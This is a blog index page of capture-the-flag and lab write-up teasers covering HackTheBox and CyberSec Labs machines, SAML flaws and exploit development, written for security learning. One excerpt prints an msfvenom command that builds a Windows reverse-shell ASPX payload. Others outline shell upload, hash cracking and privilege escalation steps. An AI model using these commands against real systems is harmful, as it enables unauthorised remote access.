Secrets are meant to be secret

Doctor ~ HackTheBox

Introduction Doctor is easy level machine released on 26 September2020 on HacTheBox and created by egotisticalSW The blog is for educational purposes only. Enumeration IP-: As always, I added IP In hosts file. Lets start with Port Scanning Nmap softwareuser@parrot:~… Continue Reading →

Let’s have a SAML talks!

Hey all 👋How’s everyone doing?! Hope you are fine and keeping yourself productiveThis article will only focus on SAML basics and few vulnerabilities associated with it. The Introduction In layman’s term, “SAML is that one friend(Identity Provider) of yours in… Continue Reading →

Compromised – writeup

Introduction Compromised machine released on 12 Sep 2020 on Hackthebox and create by D4nch3n Enumeration IP-: As always, I added IP In hosts file. softwareuser@parrot:~ sudo nmap -sC -sS -sV -T4 -A -oN nmap/intial_scan compromised.htb -sC for default scripts-sV for… Continue Reading →

Hackthebox Traceback

Hey folks, today we are going to go through Traceback machine on HTB.Let us jump right into it. — First we perform “nmap” Starting Nmap 7.80 ( ) at 2020-07-18 16:45 ISTStats: 0:00:57 elapsed; 0 hosts completed (1 up),… Continue Reading →

What to expect in 2021….

Some of our members has wrote a short summary about what to expect in 2021. Especially on India, there should be more cybersec opportunities for nation perspective. As for the previous year, we saw that some most critical attacks can… Continue Reading →

Part 1: Introduction to Exploit Development

Introduction This is the first part of my exploit development series. The first part will cover the basic things like Ideology, Mechanism behind exploits and a couple of things to keep in mind if we want to get to and… Continue Reading →

Hackthebox – Remote

Summary Mount the NFS Get the SHA1 hash from .sdf file Crack the hash with John Get the RCE Exploit Capture user.txt Run winpeas Found vulnerability on UsoSvc Escalate to Administrator with UsoSvc Get reverse shell as Administrator Capture root.txt… Continue Reading →

Weak CyberSec Labs Weak Walkthrough FTP anonymous login allowed upload shell.aspx rev shell and get a shell      msfvenom -p windows/x64/shell_reverse_tcp lhost= lport=443 -f aspx > shell.aspx Priv Esc Running whoami /priv we get SeImpersonatePrivilege token enabled So a… Continue Reading →

CMS Cybersec Labs CMS Writeup Another wordpress site Running WPscan we find /uploads directory Which has a screenshot of an id_rsa file’s location which is in /home/angel/.ssh/id_rsa also wpscan shows twenty twenty theme vulnerable but cant find anything But there’s… Continue Reading →

Shares CyberSec Labs Shares Walkthrough. As the name itself suggest, it has an nfs share open Looks like /home/amir can be mounted to our machine Using mount –t nfs  /tmp/shares/ we mount the amir share to our machine’s /tmp/shares/… Continue Reading →

« Older posts

© 2021 MYSTIKO — Powered by WordPress

Theme by Anders NorenUp ↑